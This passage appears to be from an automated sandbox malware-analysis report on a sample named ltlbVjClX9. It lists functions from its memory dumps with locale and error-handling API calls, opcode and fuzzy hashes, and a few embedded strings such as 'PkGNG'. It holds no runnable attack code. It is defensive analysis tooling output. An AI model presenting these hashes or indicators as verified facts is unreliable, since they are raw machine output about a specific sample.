Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698

Function 0218229D Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0217847C: GetLastError.KERNEL32(?,0216F987,0216AA5C,0216F987,00474EF8,PkGNG,0216D07C,FF8BC35D,00474EF8,00474EF8), ref: 02178480
Part of subcall function 0217847C: _free.LIBCMT ref: 021784B3
Part of subcall function 0217847C: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784F4
Part of subcall function 0217847C: _abort.LIBCMT ref: 021784FA

EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,02174CD3,?,0218291B,02174CD3,?,?,?,?,?,02174CD3,?,?), ref: 021822E9

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction ID: b5e345a3aaf3f97894ac12b313d15effbbf8a7e5cd3b5789cd3ad0153cbf1e44
Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction Fuzzy Hash: 48F022322403046FDB256F7998C0B6A7B92EF80368B05442DED418B680D7B198019A00

Function 02178B54 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,02174731,?,00000004), ref: 02178BA7

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
Instruction ID: 2bf0290a09324c041f3a661945d245a30ae3c80a8b3b4a56d3d99af3710ad8e2
Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
Instruction Fuzzy Hash: 7AF0F631680308FBCB116F60DC09F6E7B21EF44712F514165FC0927261CB719D24AE9A

Function 0217866B Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02175AEF: RtlEnterCriticalSection.NTDLL(?), ref: 02175AFE

EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 021786A3

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction ID: ffba3e1678b7a8d29604902f6a209d37d3a6b89e55ab5ccbe97d70cc80bdf742
Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction Fuzzy Hash: C4F04976A90200EFD700EF68D989B5E77F2EB04721F10456AF814DB2A1DBB589809F89

Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445888: RtlEnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897

EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09

Function 021821B7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0217847C: GetLastError.KERNEL32(?,0216F987,0216AA5C,0216F987,00474EF8,PkGNG,0216D07C,FF8BC35D,00474EF8,00474EF8), ref: 02178480
Part of subcall function 0217847C: _free.LIBCMT ref: 021784B3
Part of subcall function 0217847C: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 021784F4
Part of subcall function 0217847C: _abort.LIBCMT ref: 021784FA

EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,02182979,02174CD3,?,?,?,?,?,02174CD3,?,?,?), ref: 021821EE

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction ID: b2873ae9e4c47f754dbe6cbdaca24d804b3a9cdcd3d7ccae5f8eddd1e6cbacd4
Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction Fuzzy Hash: 61F0553A38024467CB15AF39C849B7A7F91EFC1761F160069EE058B261C3719842DB64

Function 0214DDC9 Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 0214DDCA

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 5bd247f65566e5dcac570d963c8fc58fd9122a78ba50124b87c8ae73a408a6cb
Instruction ID: 3d9a3482f855219589d1c26d83301d165a42262afe49370ff87151cb06276bda
Opcode Fuzzy Hash: 5bd247f65566e5dcac570d963c8fc58fd9122a78ba50124b87c8ae73a408a6cb
Instruction Fuzzy Hash: 82B181391142998ACF05EF68C4913F63BA1EF6A300F4851B9EC9CCF756E7358506EB64

Function 0213FB38 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,02145763,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,004674AC), ref: 0213FB4C

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
Instruction ID: df65241b82b9623915ca1403263ed9b6934a87cb101235b95c290dfc735789e3
Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
Instruction Fuzzy Hash: 69D05B3074021C7BD61096959C0AEAA779CE705B52F000195BE05D72C0D9A05E0447D1

Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
Instruction Fuzzy Hash:

Function 0216E333 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0216E4A3

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
Instruction ID: 6346d28403ca69d217cd960631d67a55f9e06d7384a39760478fab399123e2d3
Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
Instruction Fuzzy Hash: E451597D2C07449AEF38897C845CFBF27969B06248F0C0B1AD882CBA81D715D576C792

Function 0216E104 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0216E274

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
Instruction ID: c681cc4aaf93b4197d3c4bb4c5fc396eeec4461d9cb791d29f0edb98c1adda69
Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
Instruction Fuzzy Hash: 875134BD3C0A045BDF3C8AA8885DFBF279A9B02704F08071ED892CB681C705E936D752

Function 0043E0CC Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 0043E23C

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
Instruction ID: cdd912994a32e16cda9accbda93f1ea0618352901e275441ec4d65c4c105c2b3
Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
Instruction Fuzzy Hash: 9C514771603648A7DF3489AB88567BF63899B0E344F18394BD882C73C3C62DED02975E

Function 02157CAD Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

@, xrefs: 02157D04

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
Instruction ID: fe07e282a0c4ed953065db71dc77c9e4327b590eb4fc48b9b38216a782ab2550
Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
Instruction Fuzzy Hash: 964117759187458BC340CF29C58121AFBE1FFC8318F655A5EF899A3390D376E9828B82

Function 00427A46 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

@, xrefs: 00427A9D

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
Instruction ID: e4f6ca204f58efd2523fb0dbef6dba8f744ce0bfcff40a2940ff04dc0a880f4e
Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
Instruction Fuzzy Hash: A841FB75A187558BC340CF29C58061BFBE1FFD8318F655A1EF889A3350D375E9428B86

Function 0044D9C9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
Instruction ID: ecf94096385373c2e9f2c5c276bef480e2dc0267d4a411ba40625ecd8b408152
Opcode Fuzzy Hash: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
Instruction Fuzzy Hash: 7F323831D69F014DE7239A35C862336A289BFB73C5F15D737F816B5AAAEB28C4834105

Function 0214F361 Relevance: .6, Instructions: 598COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a43d6613d2cc44a87a2a7b42b24337b7313d3f5d9f36f695e048a997dbb0e1
Instruction ID: 7997aab21a753511a9756d98f7528fae59218618a69cd00e66a8acc4e64f6121
Opcode Fuzzy Hash: 80a43d6613d2cc44a87a2a7b42b24337b7313d3f5d9f36f695e048a997dbb0e1
Instruction Fuzzy Hash: A23207716487459FC729CF28C49076AB7E2BF84318F144A2DF8A98B791DF34D946CB82

Function 0041F0FA Relevance: .6, Instructions: 598COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a43d6613d2cc44a87a2a7b42b24337b7313d3f5d9f36f695e048a997dbb0e1
Instruction ID: 709358690f7fb2d2e3012b2358c769367bf3ff6314f01af24d3ecfcd65fe7181
Opcode Fuzzy Hash: 80a43d6613d2cc44a87a2a7b42b24337b7313d3f5d9f36f695e048a997dbb0e1
Instruction Fuzzy Hash: 443290716087459BD715DE28C4807AAB7E1BF84318F044A3EF89587392D778DD8BCB8A

Function 00437D33 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: b3ba5b81110409d95a5723b53b6c8744913893e641e186edab39e166e1bc966b
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 7DC1B1723091930ADF2D4A3D853453FFBA15AA57B171A275FE8F2CB2C1EE18C524D524

Function 00438168 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 7f684bb0481695d58232a2b0d47c85f4cbd32b92c5f53758fc2a28b9861b6fac
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: EAC1C5723092930ADF2D463D853453FFBA15AA57B171A275EE8F2CB2C5FE28C524C614

Function 004378FE Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: b4bbf9256ac03f5d23606f900b1ff113549fac5ad7a5b3908127750d008d8003
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: FDC1B0B230D1930ADB3D4A3D953453FBBA15AA63B171A275ED8F2CB2C1FE18C524D624

Function 004374E6 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: c0cc860fb011aaa8bec1e183ca1ba44e4399d72b3d9d4532b0ef978257cdf629
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 08C1A0B230D1930ADB3D463D853853FBBA15AA67B171A276ED8F2CB2C1FE18C524D614

Function 0216E7BF Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
Instruction ID: c69e242139384ceccf698b170f294464458b210c28bf7bd80f717ef9cd35be20
Opcode Fuzzy Hash: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
Instruction Fuzzy Hash: A0617A3DAC07099ADE385E68989CFBE239DEF41348F10473AD842DB280D711D972CB95

Function 0216E562 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
Instruction ID: f52cb585c803666b54b41193c6964248e8ca6f8682ff395fce91f70a29a4ae8d
Opcode Fuzzy Hash: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
Instruction Fuzzy Hash: 1061697D6C06085ADE385E6C88ACFBE2396AB41608F00071EE942DF2C1E711D972CFD9

Function 0043E2FB Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
Instruction ID: 9176630f27626b4b14444871c43cfb7a364794bde640040d1d9abeeee83df0d0
Opcode Fuzzy Hash: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
Instruction Fuzzy Hash: E1614531602709E6EF349A2B48917BF2395AB1D304F58341BED42DB3C1D55DED428A1E

Function 0043E558 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
Instruction ID: c8a25274eb6ace22fd939f207aba0bb726f52b15d0dfb3f1b2e2615f3a586ecc
Opcode Fuzzy Hash: c6b1042308d2b4dc2ea763a701fecb4f21cb89e1eeb5fcb47da04713de909616
Instruction Fuzzy Hash: B2619C71602609A6DA34496B8893BBF6394EB6D308F94341BE443DB3C1E61DEC43875E

Function 02157E16 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba1fc680d59fa3119c336882322ad8c37fd3cd0560676a8d3a4e4a4c2211dd3
Instruction ID: 7e311a6e3a3c6d682fca8bdbb49df97e3fe8c7eb851372d51bd9ea71b2280a33
Opcode Fuzzy Hash: 2ba1fc680d59fa3119c336882322ad8c37fd3cd0560676a8d3a4e4a4c2211dd3
Instruction Fuzzy Hash: E5616C32A483559FC304DF34C581A5FF7E9AFC8714F440E2EF8A596190EB74EA098B82

Function 00427BAF Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba1fc680d59fa3119c336882322ad8c37fd3cd0560676a8d3a4e4a4c2211dd3
Instruction ID: 96b5c22f40dc969dc1399d427f9382315b517a9523814fa291cced01a0c32d8b
Opcode Fuzzy Hash: 2ba1fc680d59fa3119c336882322ad8c37fd3cd0560676a8d3a4e4a4c2211dd3
Instruction Fuzzy Hash: 5B617E72A083059FC304DF35D581A5FB7E5AFCC318F510E2EF499D6151EA35EA088B86

Function 021689D7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 7d4e8d882c77a1d3fb6e7b817a8edd204751df12554ae11ea37fb14078b7ee54
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
